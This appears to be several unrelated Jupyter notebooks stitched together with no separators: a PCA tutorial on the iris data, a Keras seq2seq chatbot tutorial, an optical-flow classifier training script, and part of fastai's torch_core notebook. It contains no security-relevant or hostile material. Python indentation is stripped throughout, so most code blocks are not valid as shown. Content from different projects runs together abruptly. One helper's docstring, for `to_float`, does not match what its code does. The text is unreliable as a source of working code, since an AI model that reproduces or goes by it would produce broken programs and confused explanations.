cum_var_exp = np.cumsum(var_exp)
# plot
with plt.style.context('seaborn-whitegrid'):
plt.figure(figsize=figsize)
plt.bar(range(len(var_exp)), var_exp, alpha=0.5, align='center',
label='individual explained variance')
plt.step(range(len(var_exp)), cum_var_exp, where='mid',
label='cumulative explained variance')
plt.ylabel('Explained variance ratio')
plt.xlabel('Principal components')
plt.legend(loc='best')
plt.tight_layout()
plt.show()
var_exp = my_pca.explained_variance_ratio_
plot_var_explained(var_exp, figsize=(6,4))
# plot a simpler version of the bar chart
pd.DataFrame(my_pca.explained_variance_ratio_).plot.bar()
```
The plot above clearly shows that most of the variance (72.77% of the variance to be precise) can be explained by the first principal component alone. The second principal component still bears some information (23.03%) while the third and fourth principal components can safely be dropped without losing too much information. Together, the first two principal components contain 95.8% of the information.
### 3. Check the loadings of each principal component
```
PC_df = pd.DataFrame(my_pca.components_,columns=df.iloc[:,0:4].columns).transpose()
PC_df
import seaborn as sns
plt.figure(figsize=None) #(4,4)
sns.heatmap(PC_df,cmap="RdBu_r",annot=PC_df.values, linewidths=1, center=0)
```
From the heatmap & table above, we can see that the first component consists of all 4 features, with a smaller weight on sepal_wid.
### 4. Projection onto the new feature space
During this step we will take the top k eigenvectors and use it to transform the original dataset X to obtain a k-dimensional feature subspace X′.
```
sklearn_pca = PCA(n_components=2)
Y_sklearn = sklearn_pca.fit_transform(X_std)
Y_sklearn[1:10]
```
Each row in the array above shows the projected values of one observation onto the first two principal components. If we want to fit a model using the data projected onto its first 2 principal components, then `Y_sklearn` is the data we want to use.
## <a id="usage">PCA Usage</a>
### Data Visualization
We can use PCA as a tool for data visualization. For instance, if we can obtain a two-dimensional representation of the data that captures most of the information, then we can plot the observations in this low-dimensional space.
Let's see how it will be like using IRIS data if we plot it out in the first two principal components.
```
with plt.style.context('seaborn-whitegrid'):
plt.figure(figsize=(6, 4))
for lab, col in zip(('Iris-setosa', 'Iris-versicolor', 'Iris-virginica'),
('blue', 'red', 'green')):
print(lab)
print(col)
plt.scatter(Y_sklearn[y==lab, 0],
Y_sklearn[y==lab, 1],
label=lab,
c=col)
plt.xlabel('Principal Component 1')
plt.ylabel('Principal Component 2')
plt.legend(loc='lower center')
plt.tight_layout()
plt.show()
```
### Principal Component Regression
We can use principal components as predictors in a regression model in place of the original larger set of variables.
Let's compare the result of a logistic regression using all the features with one using only the first two components.
```
# the code is copied from Ethen's PCA blog post, which is listed in the reference.
# split 30% of the iris data into a test set for evaluation
X_train, X_test, y_train, y_test = train_test_split(
X, y, test_size = 0.3, random_state = 1)
# create the pipeline, where we'll
# standardize the data, perform PCA and
# fit the logistic regression
pipeline1 = Pipeline([
('standardize', StandardScaler()),
('pca', PCA(n_components = 2)),
('logistic', LogisticRegression(random_state = 1))
])
pipeline1.fit(X_train, y_train)
y_pred1 = pipeline1.predict(X_test)
# pipeline without PCA
pipeline2 = Pipeline([
('standardize', StandardScaler()),
('logistic', LogisticRegression(random_state = 1))
])
pipeline2.fit(X_train, y_train)
y_pred2 = pipeline2.predict(X_test)
# access the prediction accuracy
print('PCA Accuracy %.3f' % accuracy_score(y_test, y_pred1))
print('Accuracy %.3f' % accuracy_score(y_test, y_pred2))
```
We see that by using only the first two components, the accuracy drops by just 0.022 (roughly 2%) from the original. In fact, by using the first three principal components, we can get the same accuracy as the original model with all the features.
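A common way to decide how many components to keep is the cumulative explained-variance ratio. Here is a hedged NumPy sketch (with synthetic data standing in for the iris features, which aren't reloaded here): the eigenvalues of the covariance matrix, sorted in descending order, give each component's share of the total variance.

```python
import numpy as np

# Synthetic stand-in for a standardized feature matrix.
rng = np.random.RandomState(0)
X = rng.randn(150, 4) @ np.diag([3.0, 2.0, 1.0, 0.5])
Xc = X - X.mean(axis=0)

# Eigenvalues of the covariance matrix, largest first.
eigvals = np.linalg.eigvalsh(np.cov(Xc, rowvar=False))[::-1]
explained = eigvals / eigvals.sum()

# Pick the smallest k whose cumulative ratio is "enough" for your task.
print(np.cumsum(explained))
```

With real data, this curve makes the trade-off explicit: two components were enough here to lose only ~2% accuracy, and three recovered it entirely.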
### Reference
* [PCA in 3 steps](http://sebastianraschka.com/Articles/2015_pca_in_3_steps.html)
* [Everything you did and didn't know about PCA](http://alexhwilliams.info/itsneuronalblog/2016/03/27/pca/)
* [Ethen: Principal Component Analysis (PCA) from scratch](http://nbviewer.jupyter.org/github/ethen8181/machine-learning/blob/master/dim_reduct/PCA.ipynb)
* [Wiki: Matrix Multiplication](https://en.wikipedia.org/wiki/Matrix_multiplication)
* [Sklearn: Pipelining: chaining a PCA and a logistic regression](http://scikit-learn.org/stable/auto_examples/plot_digits_pipe.html#sphx-glr-auto-examples-plot-digits-pipe-py)
# Chatbot using Seq2Seq LSTM models
In this notebook, we will assemble a seq2seq LSTM model using the Keras Functional API to create a working chatbot that answers questions asked of it.
Chatbots have become applications in their own right. You can choose a field or stream and gather data on various questions. We can build a chatbot for an e-commerce website, or for a school website where parents could get information about the school.
Messaging platforms like Allo have implemented chatbot services to engage users. The famous [Google Assistant](https://assistant.google.com/), [Siri](https://www.apple.com/in/siri/), [Cortana](https://www.microsoft.com/en-in/windows/cortana) and [Alexa](https://www.alexa.com/) may have been built using similar models.
So, let's start building our Chatbot.
## 1) Importing the packages
We will import [TensorFlow](https://www.tensorflow.org) and our beloved [Keras](https://www.tensorflow.org/guide/keras). Also, we import other modules which help in defining model layers.
```
import numpy as np
import tensorflow as tf
import pickle
from tensorflow.keras import layers , activations , models , preprocessing
```
## 2) Preprocessing the data
### A) Download the data
The dataset hails from [chatterbot/english on Kaggle](https://www.kaggle.com/kausr25/chatterbotenglish) by [kausr25](https://www.kaggle.com/kausr25). It contains pairs of questions and answers on a number of subjects such as food, history, AI etc.
The raw data can be found in this repo -> https://github.com/shubham0204/Dataset_Archives
```
!wget https://github.com/shubham0204/Dataset_Archives/blob/master/chatbot_nlp.zip?raw=true -O chatbot_nlp.zip
!unzip chatbot_nlp.zip
```
### B) Reading the data from the files
We parse each of the `.yaml` files.
* Concatenate two or more sentences if the answer has two or more of them.
* Remove unwanted data types which are produced while parsing the data.
* Append `<START>` and `<END>` to all the `answers`.
* Create a `Tokenizer` and load the whole vocabulary ( `questions` + `answers` ) into it.
```
from tensorflow.keras import preprocessing , utils
import os
import yaml
dir_path = 'chatbot_nlp/data'
files_list = os.listdir(dir_path + os.sep)
questions = list()
answers = list()
for filepath in files_list:
stream = open( dir_path + os.sep + filepath , 'rb')
docs = yaml.safe_load(stream)
conversations = docs['conversations']
for con in conversations:
if len( con ) > 2 :
questions.append(con[0])
replies = con[ 1 : ]
ans = ''
for rep in replies:
ans += ' ' + rep
answers.append( ans )
elif len( con )> 1:
questions.append(con[0])
answers.append(con[1])
answers_with_tags = list()
clean_questions = list()
# iterate over question/answer pairs together, so the two lists
# never go out of sync (popping while indexing shifts the indices)
for question , answer in zip( questions , answers ):
    if type( answer ) == str:
        clean_questions.append( question )
        answers_with_tags.append( answer )
questions = clean_questions
answers = list()
for i in range( len( answers_with_tags ) ) :
answers.append( '<START> ' + answers_with_tags[i] + ' <END>' )
tokenizer = preprocessing.text.Tokenizer()
tokenizer.fit_on_texts( questions + answers )
VOCAB_SIZE = len( tokenizer.word_index )+1
print( 'VOCAB SIZE : {}'.format( VOCAB_SIZE ))
```
### C) Preparing data for Seq2Seq model
Our model requires three arrays namely `encoder_input_data`, `decoder_input_data` and `decoder_output_data`.
For `encoder_input_data` :
* Tokenize the `questions`. Pad them to their maximum length.
For `decoder_input_data` :
* Tokenize the `answers`. Pad them to their maximum length.
For `decoder_output_data` :
* Tokenize the `answers`. Remove the first element from all the `tokenized_answers`. This is the `<START>` element which we added earlier.
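As a toy illustration (the token ids below are made up, not real `tokenizer` output), the decoder input keeps the `<START>` token while the decoder target is the same sequence shifted left by one step:

```python
# Suppose "<START> hello world <END>" tokenizes to:
tokenized_answer = [1, 7, 9, 2]

decoder_input  = tokenized_answer        # what the decoder sees
decoder_target = tokenized_answer[1:]    # what it must predict next

# Post-pad both to a common maximum length, as pad_sequences does below.
maxlen = 5
pad = lambda seq: seq + [0] * (maxlen - len(seq))
print(pad(decoder_input))   # [1, 7, 9, 2, 0]
print(pad(decoder_target))  # [7, 9, 2, 0, 0]
```

At every timestep the target is the next token of the input, which is exactly the teacher-forcing setup the arrays below implement.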
```
from gensim.models import Word2Vec
import re
vocab = []
for word in tokenizer.word_index:
vocab.append( word )
def tokenize( sentences ):
tokens_list = []
vocabulary = []
for sentence in sentences:
sentence = sentence.lower()
sentence = re.sub( '[^a-zA-Z]', ' ', sentence )
tokens = sentence.split()
vocabulary += tokens
tokens_list.append( tokens )
return tokens_list , vocabulary
#p = tokenize( questions + answers )
#model = Word2Vec( p[ 0 ] )
#embedding_matrix = np.zeros( ( VOCAB_SIZE , 100 ) )
#for i in range( len( tokenizer.word_index ) ):
#embedding_matrix[ i ] = model[ vocab[i] ]
# encoder_input_data
tokenized_questions = tokenizer.texts_to_sequences( questions )
maxlen_questions = max( [ len(x) for x in tokenized_questions ] )
padded_questions = preprocessing.sequence.pad_sequences( tokenized_questions , maxlen=maxlen_questions , padding='post' )
encoder_input_data = np.array( padded_questions )
print( encoder_input_data.shape , maxlen_questions )
# decoder_input_data
tokenized_answers = tokenizer.texts_to_sequences( answers )
maxlen_answers = max( [ len(x) for x in tokenized_answers ] )
padded_answers = preprocessing.sequence.pad_sequences( tokenized_answers , maxlen=maxlen_answers , padding='post' )
decoder_input_data = np.array( padded_answers )
print( decoder_input_data.shape , maxlen_answers )
# decoder_output_data
tokenized_answers = tokenizer.texts_to_sequences( answers )
for i in range(len(tokenized_answers)) :
tokenized_answers[i] = tokenized_answers[i][1:]
padded_answers = preprocessing.sequence.pad_sequences( tokenized_answers , maxlen=maxlen_answers , padding='post' )
onehot_answers = utils.to_categorical( padded_answers , VOCAB_SIZE )
decoder_output_data = np.array( onehot_answers )
print( decoder_output_data.shape )
```
## 3) Defining the Encoder-Decoder model
The model will have Embedding, LSTM and Dense layers. The basic configuration is as follows.
* 2 Input Layers : one for `encoder_input_data` and another for `decoder_input_data`.
* Embedding layer : for converting token vectors to fixed-size dense vectors. **( Note : Don't forget the `mask_zero=True` argument here )**
* LSTM layer : provides access to long short-term memory cells.
Working :
1. The `encoder_input_data` goes into the Embedding layer ( `encoder_embedding` ).
2. The output of the Embedding layer goes to the LSTM cell, which produces 2 state vectors ( `h` and `c`, the `encoder_states` ).
3. These states are set in the LSTM cell of the decoder.
4. The `decoder_input_data` comes in through the Embedding layer.
5. The embeddings go into the LSTM cell ( which holds the states ) to produce sequences.
<center><img style="float: center;" src="https://cdn-images-1.medium.com/max/1600/1*bnRvZDDapHF8Gk8soACtCQ.gif"></center>
Image credits to [Hackernoon](https://hackernoon.com/tutorial-3-what-is-seq2seq-for-text-summarization-and-why-68ebaa644db0).
```
encoder_inputs = tf.keras.layers.Input(shape=( maxlen_questions , ))
encoder_embedding = tf.keras.layers.Embedding( VOCAB_SIZE, 200 , mask_zero=True ) (encoder_inputs)
encoder_outputs , state_h , state_c = tf.keras.layers.LSTM( 200 , return_state=True )( encoder_embedding )
encoder_states = [ state_h , state_c ]
decoder_inputs = tf.keras.layers.Input(shape=( maxlen_answers , ))
decoder_embedding = tf.keras.layers.Embedding( VOCAB_SIZE, 200 , mask_zero=True) (decoder_inputs)
decoder_lstm = tf.keras.layers.LSTM( 200 , return_state=True , return_sequences=True )
decoder_outputs , _ , _ = decoder_lstm ( decoder_embedding , initial_state=encoder_states )
decoder_dense = tf.keras.layers.Dense( VOCAB_SIZE , activation=tf.keras.activations.softmax )
output = decoder_dense ( decoder_outputs )
model = tf.keras.models.Model([encoder_inputs, decoder_inputs], output )
model.compile(optimizer=tf.keras.optimizers.RMSprop(), loss='categorical_crossentropy')
model.summary()
```
## 4) Training the model
We train the model for a number of epochs with `RMSprop` optimizer and `categorical_crossentropy` loss function.
```
model.fit([encoder_input_data , decoder_input_data], decoder_output_data, batch_size=50, epochs=150 )
model.save( 'model.h5' )
```
## 5) Defining inference models
We create inference models which help in predicting answers.
**Encoder inference model** : Takes the question as input and outputs LSTM states ( `h` and `c` ).
**Decoder inference model** : Takes in 2 inputs: the LSTM states ( the output of the encoder model ) and the answer input sequences ( without the `<START>` tag ). It outputs the answers for the question we fed to the encoder model, along with its updated state values.
```
def make_inference_models():
encoder_model = tf.keras.models.Model(encoder_inputs, encoder_states)
decoder_state_input_h = tf.keras.layers.Input(shape=( 200 ,))
decoder_state_input_c = tf.keras.layers.Input(shape=( 200 ,))
decoder_states_inputs = [decoder_state_input_h, decoder_state_input_c]
decoder_outputs, state_h, state_c = decoder_lstm(
decoder_embedding , initial_state=decoder_states_inputs)
decoder_states = [state_h, state_c]
decoder_outputs = decoder_dense(decoder_outputs)
decoder_model = tf.keras.models.Model(
[decoder_inputs] + decoder_states_inputs,
[decoder_outputs] + decoder_states)
return encoder_model , decoder_model
```
## 6) Talking with our Chatbot
First, we define a method `str_to_tokens` which converts a `str` question to integer tokens with padding.
```
def str_to_tokens( sentence : str ):
words = sentence.lower().split()
tokens_list = list()
for word in words:
tokens_list.append( tokenizer.word_index[ word ] )
return preprocessing.sequence.pad_sequences( [tokens_list] , maxlen=maxlen_questions , padding='post')
```
1. First, we take a question as input and predict the state values using `enc_model`.
2. We set the state values in the decoder's LSTM.
3. Then, we generate a sequence which contains the `<start>` element.
4. We input this sequence in the `dec_model`.
5. We replace the `<start>` element with the element which was predicted by the `dec_model` and update the state values.
6. We carry out the above steps iteratively till we hit the `<end>` tag or the maximum answer length.
```
enc_model , dec_model = make_inference_models()
for _ in range(10):
states_values = enc_model.predict( str_to_tokens( input( 'Enter question : ' ) ) )
empty_target_seq = np.zeros( ( 1 , 1 ) )
empty_target_seq[0, 0] = tokenizer.word_index['start']
stop_condition = False
decoded_translation = ''
while not stop_condition :
dec_outputs , h , c = dec_model.predict([ empty_target_seq ] + states_values )
sampled_word_index = np.argmax( dec_outputs[0, -1, :] )
sampled_word = None
for word , index in tokenizer.word_index.items() :
if sampled_word_index == index :
decoded_translation += ' {}'.format( word )
sampled_word = word
if sampled_word == 'end' or len(decoded_translation.split()) > maxlen_answers:
stop_condition = True
empty_target_seq = np.zeros( ( 1 , 1 ) )
empty_target_seq[ 0 , 0 ] = sampled_word_index
states_values = [ h , c ]
print( decoded_translation )
```
## 7) Conversion to TFLite ( Optional )
We can convert our seq2seq model to a TensorFlow Lite model so that we can use it on edge devices.
```
!pip install tf-nightly
converter = tf.lite.TFLiteConverter.from_keras_model( enc_model )
buffer = converter.convert()
open( 'enc_model.tflite' , 'wb' ).write( buffer )
converter = tf.lite.TFLiteConverter.from_keras_model( dec_model )
buffer = converter.convert()
open( 'dec_model.tflite' , 'wb' ).write( buffer )
```
```
from config import *
import mPyPl as mp
from mPyPl.utils.flowutils import *
from mpyplx import *
from pipe import Pipe
from functools import partial
import numpy as np
import cv2
import itertools
from moviepy.editor import *
import pickle
import functools
from config import *
test_names = (
from_json(os.path.join(source_dir,'matches.json'))
| mp.where(lambda x: 'Test' in x.keys() and int(x['Test'])>0)
| mp.apply(['Id','Half'],'pattern',lambda x: "{}_{}_".format(x[0],x[1]))
| mp.select_field('pattern')
| mp.as_list
)
stream = (
mp.get_datastream(data_dir, ext=".fflow.pickle", classes={'noshot' : 0, 'shots': 1})
| datasplit_by_pattern(test_pattern=test_names)
| stratify_sample_tt()
| mp.apply(['class_id','split'],'descr',lambda x: "{}-{}".format(x[0],x[1]))
| summarize('descr')
| mp.as_list
)
train, test = (
stream
| mp.apply('filename', 'raw', lambda x: pickle.load(open(x, 'rb')), eval_strategy=mp.EvalStrategies.LazyMemoized)
| mp.apply('raw', 'gradients', calc_gradients, eval_strategy=mp.EvalStrategies.LazyMemoized)
| mp.apply('gradients', 'polar', lambda x: to_polar(x), eval_strategy=mp.EvalStrategies.LazyMemoized)
| mp.apply('polar', 'channel1', lambda x: np.concatenate([y[0] for y in x]), eval_strategy=mp.EvalStrategies.LazyMemoized)
| mp.apply('polar', 'channel2', lambda x: np.concatenate([y[1] for y in x]), eval_strategy=mp.EvalStrategies.LazyMemoized)
| mp.make_train_test_split()
)
train = train | mp.as_list
ch1 = stream | mp.select_field('channel1') | mp.as_list
ch1_flatten = np.concatenate(ch1)
ch2 = stream | mp.select_field('channel2') | mp.as_list
ch2_flatten = np.concatenate(ch2)
%matplotlib inline
import matplotlib.pyplot as plt
plt.hist(ch1_flatten, bins=100);
plt.hist(ch2_flatten, bins=100);
```
## OpticalFlow Model Training
```
scene_changes = pickle.load(open('scene.changes.pkl', 'rb'))
scene_changes = list(scene_changes[40].keys())
scene_changes = [ fn.replace('.resized.mp4', '.fflow.pickle') for fn in scene_changes]
retinaflow_shape = (25, 50, 2)
hist_params = [
dict(
bins=retinaflow_shape[1],
lower=0,
upper=150,
maxv=150
),
dict(
bins=retinaflow_shape[1],
lower=0,
upper=6.29,
maxv=6.29
),
]
stream = (
mp.get_datastream(data_dir, ext=".fflow.pickle", classes={'noshot' : 0, 'shots': 1})
| mp.filter('filename', lambda x: not x in scene_changes)
| datasplit_by_pattern(test_pattern=test_names)
| stratify_sample_tt()
| mp.apply(['class_id','split'],'descr',lambda x: "{}-{}".format(x[0],x[1]))
| summarize('descr')
| mp.as_list
)
train, test = (
stream
| mp.apply('filename', 'raw', lambda x: pickle.load(open(x, 'rb')), eval_strategy=mp.EvalStrategies.LazyMemoized)
| mp.apply('raw', 'gradients', calc_gradients, eval_strategy=mp.EvalStrategies.LazyMemoized)
| mp.apply('gradients', 'polar', lambda x: to_polar(x), eval_strategy=mp.EvalStrategies.LazyMemoized)
| mp.apply('polar', 'histograms', lambda x: video_to_hist(x, hist_params), eval_strategy=mp.EvalStrategies.LazyMemoized)
| mp.apply('histograms', 'fflows', functools.partial(zero_pad,shape=retinaflow_shape),
eval_strategy=mp.EvalStrategies.LazyMemoized)
| mp.make_train_test_split()
)
no_train = stream | mp.filter('split',lambda x: x==mp.SplitType.Train) | mp.count
no_test = stream | mp.filter('split',lambda x: x==mp.SplitType.Test) | mp.count
# training params
LEARNING_RATE = 0.001
V = "v1"
MODEL_CHECKPOINT = "models/unet_ch_" + V + ".h5"
MODEL_PATH = MODEL_CHECKPOINT.replace("_ch_", "_model_")
HISTORY_PATH = MODEL_PATH.replace(".h5", "_history.pkl")
BATCH_SIZE = 16
EPOCHS = 50
from keras.callbacks import ModelCheckpoint
from keras.callbacks import EarlyStopping
callback_checkpoint = ModelCheckpoint(
MODEL_CHECKPOINT,
verbose=1,
monitor='val_loss',
save_best_only=True
)
callback_stopping = EarlyStopping(
monitor='val_loss',
min_delta=0,
patience=7,
verbose=1,
mode='auto',
restore_best_weights=True
)
from keras.callbacks import ReduceLROnPlateau
reduce_lr = ReduceLROnPlateau(monitor='val_loss', verbose=1, factor=0.5,
patience=4, cooldown=4, min_lr=0.0001)
from keras.models import Sequential
from keras.layers import *
from keras.regularizers import l2
from keras.optimizers import Adam
retinaflow_shape = (25, 50, 2)
model = Sequential()
model.add(Conv2D(64, (5,3), input_shape=retinaflow_shape))
model.add(Conv2D(32, (3,3), activation='relu', kernel_initializer='glorot_uniform'))
model.add(MaxPooling2D(pool_size=(3, 3)))
model.add(Dropout(0.5))
model.add(Flatten())
model.add(Dense(32, activation='relu', kernel_initializer='glorot_uniform'))
model.add(Dense(1, activation='sigmoid', kernel_initializer='glorot_uniform'))
model.compile(loss='binary_crossentropy',
optimizer=Adam(lr=LEARNING_RATE),
metrics=['acc'])
model.summary()
history = model.fit_generator(
train | mp.infshuffle | mp.as_batch('fflows', 'class_id', batchsize=BATCH_SIZE),
steps_per_epoch = no_train // BATCH_SIZE,
validation_data = test | mp.infshuffle | mp.as_batch('fflows', 'class_id', batchsize=BATCH_SIZE),
validation_steps = no_test // BATCH_SIZE,
epochs=EPOCHS,
verbose=1,
callbacks=[callback_checkpoint, callback_stopping, reduce_lr]
)
%matplotlib inline
import matplotlib.pyplot as plt
def plot_history(history):
loss_list = [s for s in history.history.keys() if 'loss' in s and 'val' not in s]
val_loss_list = [s for s in history.history.keys() if 'loss' in s and 'val' in s]
acc_list = [s for s in history.history.keys() if 'acc' in s and 'val' not in s]
val_acc_list = [s for s in history.history.keys() if 'acc' in s and 'val' in s]
if len(loss_list) == 0:
print('Loss is missing in history')
return
## As loss always exists
epochs = range(1,len(history.history[loss_list[0]]) + 1)
## Loss
plt.figure(1)
for l in loss_list:
plt.plot(epochs, history.history[l], 'b', label='Training loss (' + str(str(format(history.history[l][-1],'.5f'))+')'))
for l in val_loss_list:
plt.plot(epochs, history.history[l], 'g', label='Validation loss (' + str(str(format(history.history[l][-1],'.5f'))+')'))
plt.title('Loss')
plt.xlabel('Epochs')
plt.ylabel('Loss')
plt.legend()
## Accuracy
plt.figure(2)
for l in acc_list:
plt.plot(epochs, history.history[l], 'b', label='Training accuracy (' + str(format(history.history[l][-1],'.5f'))+')')
for l in val_acc_list:
plt.plot(epochs, history.history[l], 'g', label='Validation accuracy (' + str(format(history.history[l][-1],'.5f'))+')')
plt.title('Accuracy')
plt.xlabel('Epochs')
plt.ylabel('Accuracy')
plt.legend()
plt.show()
plot_history(history)
```
```
#default_exp torch_core
#export
from local.test import *
from local.imports import *
from local.torch_imports import *
from local.core import *
from local.notebook.showdoc import show_doc
#export
if torch.cuda.is_available(): torch.cuda.set_device(int(os.environ.get('DEFAULT_GPU') or 0))
```
# Torch Core
> Basic pytorch functions used in the fastai library
## Basics
```
#export
@patch
def __array_eq__(self:Tensor,b):
return torch.equal(self,b) if self.dim() else self==b
#export
def tensor(x, *rest, **kwargs):
"Like `torch.as_tensor`, but handle lists too, and can pass multiple vector elements directly."
if len(rest): x = (x,)+rest
# Pytorch bug in dataloader using num_workers>0
if isinstance(x, (tuple,list)) and len(x)==0: return tensor(0)
res = (torch.tensor(x, **kwargs) if isinstance(x, (tuple,list))
else as_tensor(x, **kwargs) if hasattr(x, '__array__')
else as_tensor(x, **kwargs) if is_listy(x)
else as_tensor(x, **kwargs) if is_iter(x)
else None)
if res is None:
res = as_tensor(array(x), **kwargs)
if res.dtype is torch.float64: return res.float()
if res.dtype is torch.int32:
warn('Tensor is int32: upgrading to int64; for better performance use int64 input')
return res.long()
return res
test_eq(tensor(array([1,2,3])), torch.tensor([1,2,3]))
test_eq(tensor(1,2,3), torch.tensor([1,2,3]))
test_eq_type(tensor(1.0), torch.tensor(1.0))
#export
def set_seed(s):
"Set random seed for `random`, `torch`, and `numpy` (where available)"
try: torch.manual_seed(s)
except NameError: pass
try: np.random.seed(s%(2**32-1))
except NameError: pass
random.seed(s)
set_seed(2*33)
a1 = np.random.random()
a2 = torch.rand(())
a3 = random.random()
set_seed(2*33)
b1 = np.random.random()
b2 = torch.rand(())
b3 = random.random()
test_eq(a1,b1)
test_eq(a2,b2)
test_eq(a3,b3)
#export
def _fa_rebuild_tensor (cls, *args, **kwargs): return cls(torch._utils._rebuild_tensor_v2(*args, **kwargs))
def _fa_rebuild_qtensor(cls, *args, **kwargs): return cls(torch._utils._rebuild_qtensor (*args, **kwargs))
#export
class TensorBase(Tensor, metaclass=BypassNewMeta):
def _new_meta(self, *args, **kwargs): return tensor(self)
def __reduce_ex__(self,proto):
torch.utils.hooks.warn_if_has_hooks(self)
args = (type(self), self.storage(), self.storage_offset(), tuple(self.size()), self.stride())
if self.is_quantized: args = args + (self.q_scale(), self.q_zero_point())
f = _fa_rebuild_qtensor if self.is_quantized else _fa_rebuild_tensor
return (f, args + (self.requires_grad, OrderedDict()))
#export
def _patch_tb():
def get_f(fn):
def _f(self, *args, **kwargs):
cls = self.__class__
res = getattr(super(TensorBase, self), fn)(*args, **kwargs)
return cls(res) if isinstance(res,Tensor) else res
return _f
t = tensor([1])
skips = '__class__ __deepcopy__ __delattr__ __dir__ __doc__ __getattribute__ __hash__ __init__ \
__init_subclass__ __new__ __reduce__ __reduce_ex__ __module__ __setstate__'.split()
for fn in dir(t):
if fn in skips: continue
f = getattr(t, fn)
if isinstance(f, (MethodWrapperType, BuiltinFunctionType, BuiltinMethodType, MethodType, FunctionType)):
setattr(TensorBase, fn, get_f(fn))
_patch_tb()
class _T(TensorBase): pass
t = _T(range(5))
test_eq_type(t[0], _T(0))
test_eq_type(t[:2], _T([0,1]))
test_eq_type(t+1, _T(range(1,6)))
test_eq(type(pickle.loads(pickle.dumps(t))), _T)
```
## L -
```
#export
@patch
def tensored(self:L):
"`mapped(tensor)`"
return self.mapped(tensor)
@patch
def stack(self:L, dim=0):
"Same as `torch.stack`"
return torch.stack(list(self.tensored()), dim=dim)
@patch
def cat (self:L, dim=0):
"Same as `torch.cat`"
return torch.cat (list(self.tensored()), dim=dim)
show_doc(L.tensored)
```
There are shortcuts for `torch.stack` and `torch.cat` if your `L` contains tensors or something convertible. You can manually convert with `tensored`.
```
t = L(([1,2],[3,4]))
test_eq(t.tensored(), [tensor(1,2),tensor(3,4)])
show_doc(L.stack)
test_eq(t.stack(), tensor([[1,2],[3,4]]))
show_doc(L.cat)
test_eq(t.cat(), tensor([1,2,3,4]))
```
## Chunks
```
#export
def concat(*ls):
"Concatenate tensors, arrays, lists, or tuples"
if not len(ls): return []
it = ls[0]
if isinstance(it,torch.Tensor): res = torch.cat(ls)
elif isinstance(it,ndarray): res = np.concatenate(ls)
else:
res = [o for x in ls for o in L(x)]
if isinstance(it,(tuple,list)): res = type(it)(res)
else: res = L(res)
return retain_type(res, it)
a,b,c = [1],[1,2],[1,1,2]
test_eq(concat(a,b), c)
test_eq_type(concat(tuple (a),tuple (b)), tuple (c))
test_eq_type(concat(array (a),array (b)), array (c))
test_eq_type(concat(tensor(a),tensor(b)), tensor(c))
test_eq_type(concat(TensorBase(a),TensorBase(b)), TensorBase(c))
test_eq_type(concat([1,1],1), [1,1,1])
test_eq_type(concat(1,1,1), L(1,1,1))
test_eq_type(concat(L(1,2),1), L(1,2,1))
#export
class Chunks:
"Slice and int indexing into a list of lists"
def __init__(self, chunks, lens=None):
self.chunks = chunks
self.lens = L(map(len,self.chunks) if lens is None else lens)
self.cumlens = np.cumsum(0+self.lens)
self.totlen = self.cumlens[-1]
def __getitem__(self,i):
if isinstance(i,slice): return self.getslice(i)
di,idx = self.doc_idx(i)
return self.chunks[di][idx]
def getslice(self, i):
st_d,st_i = self.doc_idx(ifnone(i.start,0))
en_d,en_i = self.doc_idx(ifnone(i.stop,self.totlen+1))
res = [self.chunks[st_d][st_i:(en_i if st_d==en_d else sys.maxsize)]]
for b in range(st_d+1,en_d): res.append(self.chunks[b])
if st_d!=en_d and en_d<len(self.chunks): res.append(self.chunks[en_d][:en_i])
return concat(*res)
def doc_idx(self, i):
if i<0: i=self.totlen+i # count from end
docidx = np.searchsorted(self.cumlens, i+1)-1
cl = self.cumlens[docidx]
return docidx,i-cl
docs = L(list(string.ascii_lowercase[a:b]) for a,b in ((0,3),(3,7),(7,8),(8,16),(16,24),(24,26)))
b = Chunks(docs)
test_eq([b[ o] for o in range(0,5)], ['a','b','c','d','e'])
test_eq([b[-o] for o in range(1,6)], ['z','y','x','w','v'])
test_eq(b[6:13], 'g,h,i,j,k,l,m'.split(','))
test_eq(b[20:77], 'u,v,w,x,y,z'.split(','))
test_eq(b[:5], 'a,b,c,d,e'.split(','))
test_eq(b[:2], 'a,b'.split(','))
t = torch.arange(26)
docs = L(t[a:b] for a,b in ((0,3),(3,7),(7,8),(8,16),(16,24),(24,26)))
b = Chunks(docs)
test_eq([b[ o] for o in range(0,5)], range(0,5))
test_eq([b[-o] for o in range(1,6)], [25,24,23,22,21])
test_eq(b[6:13], torch.arange(6,13))
test_eq(b[20:77], torch.arange(20,26))
test_eq(b[:5], torch.arange(5))
test_eq(b[:2], torch.arange(2))
docs = L(TensorBase(t[a:b]) for a,b in ((0,3),(3,7),(7,8),(8,16),(16,24),(24,26)))
b = Chunks(docs)
test_eq_type(b[:2], TensorBase(range(2)))
test_eq_type(b[:5], TensorBase(range(5)))
test_eq_type(b[9:13], TensorBase(range(9,13)))
```
## Other functions
```
#export
def apply(func, x, *args, **kwargs):
"Apply `func` recursively to `x`, passing on args"
if is_listy(x): return type(x)([apply(func, o, *args, **kwargs) for o in x])
if isinstance(x,dict): return {k: apply(func, v, *args, **kwargs) for k,v in x.items()}
res = func(x, *args, **kwargs)
return res if x is None else retain_type(res, x)
#export
def to_detach(b, cpu=True):
"Recursively detach lists of tensors in `b`; put them on the CPU if `cpu=True`."
def _inner(x, cpu=True):
if not isinstance(x,Tensor): return x
x = x.detach()
return x.cpu() if cpu else x
return apply(_inner, b, cpu=cpu)
#export
def to_half(b):
"Recursively map lists of tensors in `b` to FP16."
return apply(lambda x: x.half() if torch.is_floating_point(x) else x, b)
#export
def to_float(b):
"Recursively map lists of int tensors in `b` to float."
return apply(lambda x: x.float() if torch.is_floating_point(x) else x, b)
#export
# None: True if available; True: error if not available; False: use CPU
defaults.use_cuda = None
#export
def default_device(use_cuda=-1):
"Return or set default device; `use_cuda`: None - CUDA if available; True - error if not available; False - CPU"
if use_cuda != -1: defaults.use_cuda=use_cuda
use = defaults.use_cuda or (torch.cuda.is_available() and defaults.use_cuda is None)
assert torch.cuda.is_available() or not use
return torch.device(torch.cuda.current_device()) if use else torch.device('cpu')
#cuda
_td = torch.device(torch.cuda.current_device())
test_eq(default_device(None), _td)
test_eq(default_device(True), _td)
test_eq(default_device(False), torch.device('cpu'))
default_device(None);
#export
def to_device(b, device=None):
"Recursively put `b` on `device`."
if device is None: device=default_device()
def _inner(o): return o.to(device, non_blocking=True) if isinstance(o,Tensor) else o
return apply(_inner, b)
t = to_device((3,(tensor(3),tensor(2))))
t1,(t2,t3) = t
test_eq_type(t,(3,(tensor(3).cuda(),tensor(2).cuda())))
